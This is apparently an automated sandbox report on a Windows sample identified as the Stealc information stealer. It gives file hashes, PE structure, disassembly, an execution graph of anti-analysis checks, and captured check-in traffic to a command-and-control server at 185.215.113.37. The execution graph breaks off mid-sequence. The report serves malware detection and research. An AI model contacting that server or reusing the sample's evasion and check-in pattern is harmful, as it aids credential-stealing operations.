                      SHA512:b917148554b232eec9fce319791e87b4fd7630ea9b16db4b899bafb7406ac516c1418dda0f5286be1c9cd86acd516a405dda8c85b9cccab59e1a17dac46750df
                      SSDEEP:49152:zzgWOqtxDQL+/nn70NnCtVb1trDTeuxsnb:4WOq7U6nIGbzrDU
                      TLSH:D1853339BFDFFC82C599827818770F944398A1594AFF8C140B6DB99DE883671851F8B1
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                      File Icon

                      Icon Hash:90cececece8e8eb0

                      Static PE Info

                      General

                      Entrypoint:0xaa4000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007F74487E635Ah
                      punpckldq mm3, qword ptr [eax+eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      jmp 00007F74487E8355h
                      add byte ptr [ecx], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax+00h], ah
                      add byte ptr [eax], al
                      inc esp
                      nop
                      test al, 0Fh
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [ecx], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add dword ptr [edx], ecx
                      add byte ptr [eax], al
                      or dword ptr [edx], ecx
                      add byte ptr [eax], al
                      or cl, byte ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      push es
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x25b0000x228006bf51c2b32aa35e28f728389f2d2702bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x25e0000x2a30000x2000e7e9721f84525a3139d4f418409059dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      xxhfjhyx0x5010000x1a20000x1a2000197a9cbe7317aee800fc62b29e03bdfaFalse0.9949629934210527data7.954667579008987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      wyglidst0x6a30000x10000x600f99e2c2c3ccfb6f783ab1921a416e894False0.63671875data5.393600932904426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x6a40000x30000x2200543c71d78cb4774821ed89c534ef66f8False0.06583180147058823DOS executable (COM)0.7636120967060158IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-09-30T08:57:57.444979+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 30, 2024 08:57:56.521555901 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 08:57:56.526629925 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 08:57:56.526727915 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 08:57:56.527216911 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 08:57:56.532088041 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 08:57:57.217255116 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 08:57:57.217339993 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 08:57:57.219090939 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 08:57:57.224085093 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 08:57:57.444600105 CEST8049730185.215.113.37192.168.2.4
                      Sep 30, 2024 08:57:57.444978952 CEST4973080192.168.2.4185.215.113.37
                      Sep 30, 2024 08:58:00.430322886 CEST4973080192.168.2.4185.215.113.37

                      HTTP Request Dependency Graph

                      • 185.215.113.37

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.449730185.215.113.37806996C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Sep 30, 2024 08:57:56.527216911 CEST89OUTGET / HTTP/1.1
                      Host: 185.215.113.37
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Sep 30, 2024 08:57:57.217255116 CEST203INHTTP/1.1 200 OK
                      Date: Mon, 30 Sep 2024 06:57:57 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Sep 30, 2024 08:57:57.219090939 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC
                      Host: 185.215.113.37
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 37 41 44 44 37 30 35 45 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a
                      Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="hwid"CD7ADD705E7F2148772887------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="build"doma------EGDGIIJJECFIDHJJKKFC--
                      Sep 30, 2024 08:57:57.444600105 CEST210INHTTP/1.1 200 OK
                      Date: Mon, 30 Sep 2024 06:57:57 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      System Behavior

                      General

                      Target ID:0
                      Start time:02:57:53
                      Start date:30/09/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x5e0000
                      File size:1'868'800 bytes
                      MD5 hash:F74ED5926C551EA89E49D964E729E736
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1659012750.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:7.8%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:2.9%
                        Total number of Nodes:2000
                        Total number of Limit Nodes:25
                        execution_graph 13398 8424e3 13399 842dde VirtualAlloc 13398->13399 13401 843030 13399->13401 13402 5f69f0 13447 5e2260 13402->13447 13426 5f6a64 13427 5fa9b0 4 API calls 13426->13427 13428 5f6a6b 13427->13428 13429 5fa9b0 4 API calls 13428->13429 13430 5f6a72 13429->13430 13431 5fa9b0 4 API calls 13430->13431 13432 5f6a79 13431->13432 13433 5fa9b0 4 API calls 13432->13433 13434 5f6a80 13433->13434 13599 5fa8a0 13434->13599 13436 5f6b0c 13603 5f6920 GetSystemTime 13436->13603 13438 5f6a89 13438->13436 13440 5f6ac2 OpenEventA 13438->13440 13442 5f6ad9 13440->13442 13443 5f6af5 CloseHandle Sleep 13440->13443 13446 5f6ae1 CreateEventA 13442->13446 13444 5f6b0a 13443->13444 13444->13438 13446->13436 13800 5e45c0 13447->13800 13449 5e2274 13450 5e45c0 2 API calls 13449->13450 13451 5e228d 13450->13451 13452 5e45c0 2 API calls 13451->13452 13453 5e22a6 13452->13453 13454 5e45c0 2 API calls 13453->13454 13455 5e22bf 13454->13455 13456 5e45c0 2 API calls 13455->13456 13457 5e22d8 13456->13457 13458 5e45c0 2 API calls 13457->13458 13459 5e22f1 13458->13459 13460 5e45c0 2 API calls 13459->13460 13461 5e230a 13460->13461 13462 5e45c0 2 API calls 13461->13462 13463 5e2323 13462->13463 13464 5e45c0 2 API calls 13463->13464 13465 5e233c 13464->13465 13466 5e45c0 2 API calls 13465->13466 13467 5e2355 13466->13467 13468 5e45c0 2 API calls 13467->13468 13469 5e236e 13468->13469 13470 5e45c0 2 API calls 13469->13470 13471 5e2387 13470->13471 13472 5e45c0 2 API calls 13471->13472 13473 5e23a0 13472->13473 13474 5e45c0 2 API calls 13473->13474 13475 5e23b9 13474->13475 13476 5e45c0 2 API calls 13475->13476 13477 5e23d2 13476->13477 13478 5e45c0 2 API calls 13477->13478 13479 5e23eb 13478->13479 13480 5e45c0 2 API calls 13479->13480 13481 5e2404 13480->13481 13482 5e45c0 2 API calls 13481->13482 13483 5e241d 13482->13483 13484 5e45c0 2 API calls 13483->13484 13485 5e2436 13484->13485 13486 5e45c0 2 API calls 13485->13486 13487 5e244f 13486->13487 13488 5e45c0 2 API calls 13487->13488 13489 5e2468 13488->13489 13490 5e45c0 2 API calls 13489->13490 13491 5e2481 13490->13491 13492 5e45c0 2 API calls 13491->13492 13493 5e249a 13492->13493 13494 5e45c0 2 API calls 13493->13494 13495 5e24b3 13494->13495 13496 5e45c0 2 API calls 13495->13496 13497 5e24cc 13496->13497 13498 5e45c0 2 API calls 13497->13498 13499 5e24e5 13498->13499 13500 5e45c0 2 API calls 13499->13500 13501 5e24fe 13500->13501 13502 5e45c0 2 API calls 13501->13502 13503 5e2517 13502->13503 13504 5e45c0 2 API calls 13503->13504 13505 5e2530 13504->13505 13506 5e45c0 2 API calls 13505->13506 13507 5e2549 13506->13507 13508 5e45c0 2 API calls 13507->13508 13509 5e2562 13508->13509 13510 5e45c0 2 API calls 13509->13510 13511 5e257b 13510->13511 13512 5e45c0 2 API calls 13511->13512 13513 5e2594 13512->13513 13514 5e45c0 2 API calls 13513->13514 13515 5e25ad 13514->13515 13516 5e45c0 2 API calls 13515->13516 13517 5e25c6 13516->13517 13518 5e45c0 2 API calls 13517->13518 13519 5e25df 13518->13519 13520 5e45c0 2 API calls 13519->13520 13521 5e25f8 13520->13521 13522 5e45c0 2 API calls 13521->13522 13523 5e2611 13522->13523 13524 5e45c0 2 API calls 13523->13524 13525 5e262a 13524->13525 13526 5e45c0 2 API calls 13525->13526 13527 5e2643 13526->13527 13528 5e45c0 2 API calls 13527->13528 13529 5e265c 13528->13529 13530 5e45c0 2 API calls 13529->13530 13531 5e2675 13530->13531 13532 5e45c0 2 API calls 13531->13532 13533 5e268e 13532->13533 13534 5f9860 13533->13534 13805 5f9750 GetPEB 13534->13805 13536 5f9868 13537 5f987a 13536->13537 13538 5f9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13536->13538 13541 5f988c 21 API calls 13537->13541 13539 5f9b0d 13538->13539 13540 5f9af4 GetProcAddress 13538->13540 13542 5f9b46 13539->13542 13543 5f9b16 GetProcAddress GetProcAddress 13539->13543 13540->13539 13541->13538 13544 5f9b4f GetProcAddress 13542->13544 13545 5f9b68 13542->13545 13543->13542 13544->13545 13546 5f9b89 13545->13546 13547 5f9b71 GetProcAddress 13545->13547 13548 5f9b92 GetProcAddress GetProcAddress 13546->13548 13549 5f6a00 13546->13549 13547->13546 13548->13549 13550 5fa740 13549->13550 13551 5fa750 13550->13551 13552 5f6a0d 13551->13552 13553 5fa77e lstrcpy 13551->13553 13554 5e11d0 13552->13554 13553->13552 13555 5e11e8 13554->13555 13556 5e120f ExitProcess 13555->13556 13557 5e1217 13555->13557 13558 5e1160 GetSystemInfo 13557->13558 13559 5e117c ExitProcess 13558->13559 13560 5e1184 13558->13560 13561 5e1110 GetCurrentProcess VirtualAllocExNuma 13560->13561 13562 5e1149 13561->13562 13563 5e1141 ExitProcess 13561->13563 13806 5e10a0 VirtualAlloc 13562->13806 13566 5e1220 13810 5f89b0 13566->13810 13569 5e1249 __aulldiv 13570 5e129a 13569->13570 13571 5e1292 ExitProcess 13569->13571 13572 5f6770 GetUserDefaultLangID 13570->13572 13573 5f67d3 13572->13573 13574 5f6792 13572->13574 13580 5e1190 13573->13580 13574->13573 13575 5f67ad ExitProcess 13574->13575 13576 5f67cb ExitProcess 13574->13576 13577 5f67b7 ExitProcess 13574->13577 13578 5f67a3 ExitProcess 13574->13578 13579 5f67c1 ExitProcess 13574->13579 13581 5f78e0 3 API calls 13580->13581 13583 5e119e 13581->13583 13582 5e11cc 13587 5f7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13582->13587 13583->13582 13584 5f7850 3 API calls 13583->13584 13585 5e11b7 13584->13585 13585->13582 13586 5e11c4 ExitProcess 13585->13586 13588 5f6a30 13587->13588 13589 5f78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13588->13589 13590 5f6a43 13589->13590 13591 5fa9b0 13590->13591 13812 5fa710 13591->13812 13593 5fa9c1 lstrlen 13595 5fa9e0 13593->13595 13594 5faa18 13813 5fa7a0 13594->13813 13595->13594 13597 5fa9fa lstrcpy lstrcat 13595->13597 13597->13594 13598 5faa24 13598->13426 13600 5fa8bb 13599->13600 13601 5fa90b 13600->13601 13602 5fa8f9 lstrcpy 13600->13602 13601->13438 13602->13601 13817 5f6820 13603->13817 13605 5f698e 13606 5f6998 sscanf 13605->13606 13846 5fa800 13606->13846 13608 5f69aa SystemTimeToFileTime SystemTimeToFileTime 13609 5f69ce 13608->13609 13610 5f69e0 13608->13610 13609->13610 13611 5f69d8 ExitProcess 13609->13611 13612 5f5b10 13610->13612 13613 5f5b1d 13612->13613 13614 5fa740 lstrcpy 13613->13614 13615 5f5b2e 13614->13615 13848 5fa820 lstrlen 13615->13848 13618 5fa820 2 API calls 13619 5f5b64 13618->13619 13620 5fa820 2 API calls 13619->13620 13621 5f5b74 13620->13621 13852 5f6430 13621->13852 13624 5fa820 2 API calls 13625 5f5b93 13624->13625 13626 5fa820 2 API calls 13625->13626 13627 5f5ba0 13626->13627 13628 5fa820 2 API calls 13627->13628 13629 5f5bad 13628->13629 13630 5fa820 2 API calls 13629->13630 13631 5f5bf9 13630->13631 13861 5e26a0 13631->13861 13639 5f5cc3 13640 5f6430 lstrcpy 13639->13640 13641 5f5cd5 13640->13641 13642 5fa7a0 lstrcpy 13641->13642 13643 5f5cf2 13642->13643 13644 5fa9b0 4 API calls 13643->13644 13645 5f5d0a 13644->13645 13646 5fa8a0 lstrcpy 13645->13646 13647 5f5d16 13646->13647 13648 5fa9b0 4 API calls 13647->13648 13649 5f5d3a 13648->13649 13650 5fa8a0 lstrcpy 13649->13650 13651 5f5d46 13650->13651 13652 5fa9b0 4 API calls 13651->13652 13653 5f5d6a 13652->13653 13654 5fa8a0 lstrcpy 13653->13654 13655 5f5d76 13654->13655 13656 5fa740 lstrcpy 13655->13656 13657 5f5d9e 13656->13657 14587 5f7500 GetWindowsDirectoryA 13657->14587 13660 5fa7a0 lstrcpy 13661 5f5db8 13660->13661 14597 5e4880 13661->14597 13663 5f5dbe 14743 5f17a0 13663->14743 13665 5f5dc6 13666 5fa740 lstrcpy 13665->13666 13667 5f5de9 13666->13667 13668 5e1590 lstrcpy 13667->13668 13669 5f5dfd 13668->13669 14759 5e5960 13669->14759 13671 5f5e03 14903 5f1050 13671->14903 13673 5f5e0e 13674 5fa740 lstrcpy 13673->13674 13675 5f5e32 13674->13675 13676 5e1590 lstrcpy 13675->13676 13677 5f5e46 13676->13677 13678 5e5960 34 API calls 13677->13678 13679 5f5e4c 13678->13679 14907 5f0d90 13679->14907 13681 5f5e57 13682 5fa740 lstrcpy 13681->13682 13683 5f5e79 13682->13683 13684 5e1590 lstrcpy 13683->13684 13685 5f5e8d 13684->13685 13686 5e5960 34 API calls 13685->13686 13687 5f5e93 13686->13687 14914 5f0f40 13687->14914 13689 5f5e9e 13690 5e1590 lstrcpy 13689->13690 13691 5f5eb5 13690->13691 14919 5f1a10 13691->14919 13693 5f5eba 13694 5fa740 lstrcpy 13693->13694 13695 5f5ed6 13694->13695 15263 5e4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13695->15263 13697 5f5edb 13698 5e1590 lstrcpy 13697->13698 13699 5f5f5b 13698->13699 15270 5f0740 13699->15270 13701 5f5f60 13702 5fa740 lstrcpy 13701->13702 13703 5f5f86 13702->13703 13704 5e1590 lstrcpy 13703->13704 13705 5f5f9a 13704->13705 13706 5e5960 34 API calls 13705->13706 13801 5e45d1 RtlAllocateHeap 13800->13801 13804 5e4621 VirtualProtect 13801->13804 13804->13449 13805->13536 13807 5e10c2 codecvt 13806->13807 13808 5e10fd 13807->13808 13809 5e10e2 VirtualFree 13807->13809 13808->13566 13809->13808 13811 5e1233 GlobalMemoryStatusEx 13810->13811 13811->13569 13812->13593 13814 5fa7c2 13813->13814 13815 5fa7ec 13814->13815 13816 5fa7da lstrcpy 13814->13816 13815->13598 13816->13815 13818 5fa740 lstrcpy 13817->13818 13819 5f6833 13818->13819 13820 5fa9b0 4 API calls 13819->13820 13821 5f6845 13820->13821 13822 5fa8a0 lstrcpy 13821->13822 13823 5f684e 13822->13823 13824 5fa9b0 4 API calls 13823->13824 13825 5f6867 13824->13825 13826 5fa8a0 lstrcpy 13825->13826 13827 5f6870 13826->13827 13828 5fa9b0 4 API calls 13827->13828 13829 5f688a 13828->13829 13830 5fa8a0 lstrcpy 13829->13830 13831 5f6893 13830->13831 13832 5fa9b0 4 API calls 13831->13832 13833 5f68ac 13832->13833 13834 5fa8a0 lstrcpy 13833->13834 13835 5f68b5 13834->13835 13836 5fa9b0 4 API calls 13835->13836 13837 5f68cf 13836->13837 13838 5fa8a0 lstrcpy 13837->13838 13839 5f68d8 13838->13839 13840 5fa9b0 4 API calls 13839->13840 13841 5f68f3 13840->13841 13842 5fa8a0 lstrcpy 13841->13842 13843 5f68fc 13842->13843 13844 5fa7a0 lstrcpy 13843->13844 13845 5f6910 13844->13845 13845->13605 13847 5fa812 13846->13847 13847->13608 13849 5fa83f 13848->13849 13850 5f5b54 13849->13850 13851 5fa87b lstrcpy 13849->13851 13850->13618 13851->13850 13853 5fa8a0 lstrcpy 13852->13853 13854 5f6443 13853->13854 13855 5fa8a0 lstrcpy 13854->13855 13856 5f6455 13855->13856 13857 5fa8a0 lstrcpy 13856->13857 13858 5f6467 13857->13858 13859 5fa8a0 lstrcpy 13858->13859 13860 5f5b86 13859->13860 13860->13624 13862 5e45c0 2 API calls 13861->13862 13863 5e26b4 13862->13863 13864 5e45c0 2 API calls 13863->13864 13865 5e26d7 13864->13865 13866 5e45c0 2 API calls 13865->13866 13867 5e26f0 13866->13867 13868 5e45c0 2 API calls 13867->13868 13869 5e2709 13868->13869 13870 5e45c0 2 API calls 13869->13870 13871 5e2736 13870->13871 13872 5e45c0 2 API calls 13871->13872 13873 5e274f 13872->13873 13874 5e45c0 2 API calls 13873->13874 13875 5e2768 13874->13875 13876 5e45c0 2 API calls 13875->13876 13877 5e2795 13876->13877 13878 5e45c0 2 API calls 13877->13878 13879 5e27ae 13878->13879 13880 5e45c0 2 API calls 13879->13880 13881 5e27c7 13880->13881 13882 5e45c0 2 API calls 13881->13882 13883 5e27e0 13882->13883 13884 5e45c0 2 API calls 13883->13884 13885 5e27f9 13884->13885 13886 5e45c0 2 API calls 13885->13886 13887 5e2812 13886->13887 13888 5e45c0 2 API calls 13887->13888 13889 5e282b 13888->13889 13890 5e45c0 2 API calls 13889->13890 13891 5e2844 13890->13891 13892 5e45c0 2 API calls 13891->13892 13893 5e285d 13892->13893 13894 5e45c0 2 API calls 13893->13894 13895 5e2876 13894->13895 13896 5e45c0 2 API calls 13895->13896 13897 5e288f 13896->13897 13898 5e45c0 2 API calls 13897->13898 13899 5e28a8 13898->13899 13900 5e45c0 2 API calls 13899->13900 13901 5e28c1 13900->13901 13902 5e45c0 2 API calls 13901->13902 13903 5e28da 13902->13903 13904 5e45c0 2 API calls 13903->13904 13905 5e28f3 13904->13905 13906 5e45c0 2 API calls 13905->13906 13907 5e290c 13906->13907 13908 5e45c0 2 API calls 13907->13908 13909 5e2925 13908->13909 13910 5e45c0 2 API calls 13909->13910 13911 5e293e 13910->13911 13912 5e45c0 2 API calls 13911->13912 13913 5e2957 13912->13913 13914 5e45c0 2 API calls 13913->13914 13915 5e2970 13914->13915 13916 5e45c0 2 API calls 13915->13916 13917 5e2989 13916->13917 13918 5e45c0 2 API calls 13917->13918 13919 5e29a2 13918->13919 13920 5e45c0 2 API calls 13919->13920 13921 5e29bb 13920->13921 13922 5e45c0 2 API calls 13921->13922 13923 5e29d4 13922->13923 13924 5e45c0 2 API calls 13923->13924 13925 5e29ed 13924->13925 13926 5e45c0 2 API calls 13925->13926 13927 5e2a06 13926->13927 13928 5e45c0 2 API calls 13927->13928 13929 5e2a1f 13928->13929 13930 5e45c0 2 API calls 13929->13930 13931 5e2a38 13930->13931 13932 5e45c0 2 API calls 13931->13932 13933 5e2a51 13932->13933 13934 5e45c0 2 API calls 13933->13934 13935 5e2a6a 13934->13935 13936 5e45c0 2 API calls 13935->13936 13937 5e2a83 13936->13937 13938 5e45c0 2 API calls 13937->13938 13939 5e2a9c 13938->13939 13940 5e45c0 2 API calls 13939->13940 13941 5e2ab5 13940->13941 13942 5e45c0 2 API calls 13941->13942 13943 5e2ace 13942->13943 13944 5e45c0 2 API calls 13943->13944 13945 5e2ae7 13944->13945 13946 5e45c0 2 API calls 13945->13946 13947 5e2b00 13946->13947 13948 5e45c0 2 API calls 13947->13948 13949 5e2b19 13948->13949 13950 5e45c0 2 API calls 13949->13950 13951 5e2b32 13950->13951 13952 5e45c0 2 API calls 13951->13952 13953 5e2b4b 13952->13953 13954 5e45c0 2 API calls 13953->13954 13955 5e2b64 13954->13955 13956 5e45c0 2 API calls 13955->13956 13957 5e2b7d 13956->13957 13958 5e45c0 2 API calls 13957->13958 13959 5e2b96 13958->13959 13960 5e45c0 2 API calls 13959->13960 13961 5e2baf 13960->13961 13962 5e45c0 2 API calls 13961->13962 13963 5e2bc8 13962->13963 13964 5e45c0 2 API calls 13963->13964 13965 5e2be1 13964->13965 13966 5e45c0 2 API calls 13965->13966 13967 5e2bfa 13966->13967 13968 5e45c0 2 API calls 13967->13968 13969 5e2c13 13968->13969 13970 5e45c0 2 API calls 13969->13970 13971 5e2c2c 13970->13971 13972 5e45c0 2 API calls 13971->13972 13973 5e2c45 13972->13973 13974 5e45c0 2 API calls 13973->13974 13975 5e2c5e 13974->13975 13976 5e45c0 2 API calls 13975->13976 13977 5e2c77 13976->13977 13978 5e45c0 2 API calls 13977->13978 13979 5e2c90 13978->13979 13980 5e45c0 2 API calls 13979->13980 13981 5e2ca9 13980->13981 13982 5e45c0 2 API calls 13981->13982 13983 5e2cc2 13982->13983 13984 5e45c0 2 API calls 13983->13984 13985 5e2cdb 13984->13985 13986 5e45c0 2 API calls 13985->13986 13987 5e2cf4 13986->13987 13988 5e45c0 2 API calls 13987->13988 13989 5e2d0d 13988->13989 13990 5e45c0 2 API calls 13989->13990 13991 5e2d26 13990->13991 13992 5e45c0 2 API calls 13991->13992 13993 5e2d3f 13992->13993 13994 5e45c0 2 API calls 13993->13994 13995 5e2d58 13994->13995 13996 5e45c0 2 API calls 13995->13996 13997 5e2d71 13996->13997 13998 5e45c0 2 API calls 13997->13998 13999 5e2d8a 13998->13999 14000 5e45c0 2 API calls 13999->14000 14001 5e2da3 14000->14001 14002 5e45c0 2 API calls 14001->14002 14003 5e2dbc 14002->14003 14004 5e45c0 2 API calls 14003->14004 14005 5e2dd5 14004->14005 14006 5e45c0 2 API calls 